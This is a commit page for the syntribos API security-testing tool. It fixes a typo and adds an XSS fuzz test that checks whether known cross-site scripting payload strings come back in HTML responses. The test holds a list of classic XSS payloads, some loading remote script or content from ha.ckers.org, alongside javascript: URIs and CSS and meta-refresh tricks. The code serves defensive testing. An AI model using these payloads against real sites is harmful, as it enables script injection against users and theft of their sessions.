Browse Source

XSS Body Test

Change-Id: Iec74ad6a537e798648a39536f23e119bff1fcc1b
Greg Anderson 3 years ago
parent
commit
1658f6f9e1
2 changed files with 83 additions and 1 deletions
  1. 1
    1
      syntribos/tests/fuzz/xml_external.py
  2. 82
    0
      syntribos/tests/fuzz/xss.py

+ 1
- 1
syntribos/tests/fuzz/xml_external.py View File

@@ -49,7 +49,7 @@ class XMLExternalEntityBody(base_fuzz.BaseFuzzTestCase):
49 49
                   text=("A string known to be commonly returned after a "
50 50
                         "successful XML external entity attack was included "
51 51
                         "in the response. This could indicate a "
52
-                        "vulnerability to XML entity attacks attacks."),
52
+                        "vulnerability to XML entity attacks."),
53 53
                   assertions=self.data_driven_failure_cases()))
54 54
         self.test_issues()
55 55
 

+ 82
- 0
syntribos/tests/fuzz/xss.py View File

@@ -0,0 +1,82 @@
1
+"""
2
+Copyright 2016 Rackspace
3
+
4
+Licensed under the Apache License, Version 2.0 (the "License");
5
+you may not use this file except in compliance with the License.
6
+You may obtain a copy of the License at
7
+
8
+   http://www.apache.org/licenses/LICENSE-2.0
9
+
10
+Unless required by applicable law or agreed to in writing, software
11
+distributed under the License is distributed on an "AS IS" BASIS,
12
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+See the License for the specific language governing permissions and
14
+limitations under the License.
15
+"""
16
+
17
+from syntribos.issue import Issue
18
+from syntribos.tests.fuzz import base_fuzz
19
+
20
+
21
+class XSSBody(base_fuzz.BaseFuzzTestCase):
22
+    test_name = "XSS_BODY"
23
+    test_type = "data"
24
+    data_key = "xss.txt"
25
+    failure_keys = [
26
+        """<SCRIPT>alert('XSS');</SCRIPT>""",
27
+        """<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
28
+        """<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
29
+        """<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
30
+        """<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
31
+        """<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>""",
32
+        """<IMG SRC="javascript:alert('XSS');">""",
33
+        """<IMG SRC=javascript:alert('XSS')>""",
34
+        """<IMG SRC=JaVaScRiPt:alert('XSS')>""",
35
+        """<IMG SRC=javascript:alert(&quot;XSS&quot;)>""",
36
+        """<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>""",
37
+        """<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>""",
38
+        """<IMG DYNSRC="javascript:alert('XSS')">""",
39
+        """<IMG LOWSRC="javascript:alert('XSS')">""",
40
+        """<DIV STYLE="background-image: url(javascript:alert('XSS'))">""",
41
+        """<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">""",
42
+        """<DIV STYLE="width: expression(alert('XSS'));">""",
43
+        """<META HTTP-EQUIV="refresh"
44
+        CONTENT="0;url=javascript:alert('XSS');">""",
45
+        """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,
46
+        PHNjcmlwdD5hbGVydCgnWFNJyk8L3NjcmlwdD4K">""",
47
+        """<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>;
48
+        REL=stylesheet">""",
49
+        """<META HTTP-EQUIV="refresh" CONTENT="0;
50
+        URL=http://;URL=javascript:alert('XSS');">""",
51
+        """<STYLE TYPE="text/javascript">alert('XSS');</STYLE>""",
52
+        """<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE>
53
+        <A CLASS=XSS></A>""",
54
+        """<STYLE type="text/css">
55
+        BODY{background:url("javascript:alert('XSS')")}</STYLE>""",
56
+        """<BASE HREF="javascript:alert('XSS');//">""",
57
+        """<OBJECT TYPE="text/x-scriptlet"
58
+        DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>""",
59
+        """<OBJECT classid=clsid:ae24fdae-03c6-8b6-80c44f3>
60
+        <param name=url value=javascript:alert('XSS')></OBJECT>""",
61
+        """<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>"""]
62
+
63
+    def data_driven_failure_cases(self):
64
+        failure_assertions = []
65
+        if self.failure_keys is None:
66
+            return []
67
+        for line in self.failure_keys:
68
+            failure_assertions.append((self.assertNotIn,
69
+                                       line, self.resp.content))
70
+        return failure_assertions
71
+
72
+    def test_case(self):
73
+        if 'html' in self.resp.headers:
74
+            self.register_issue(
75
+                Issue(test="xss_strings",
76
+                      severity="High",
77
+                      text=("A string known to be commonly returned after a "
78
+                            "successful XSS attack was included "
79
+                            "in the response. This could indicate a "
80
+                            "XSS vulnerability"),
81
+                      assertions=self.data_driven_failure_cases()))
82
+            self.test_issues()

Loading…
Cancel
Save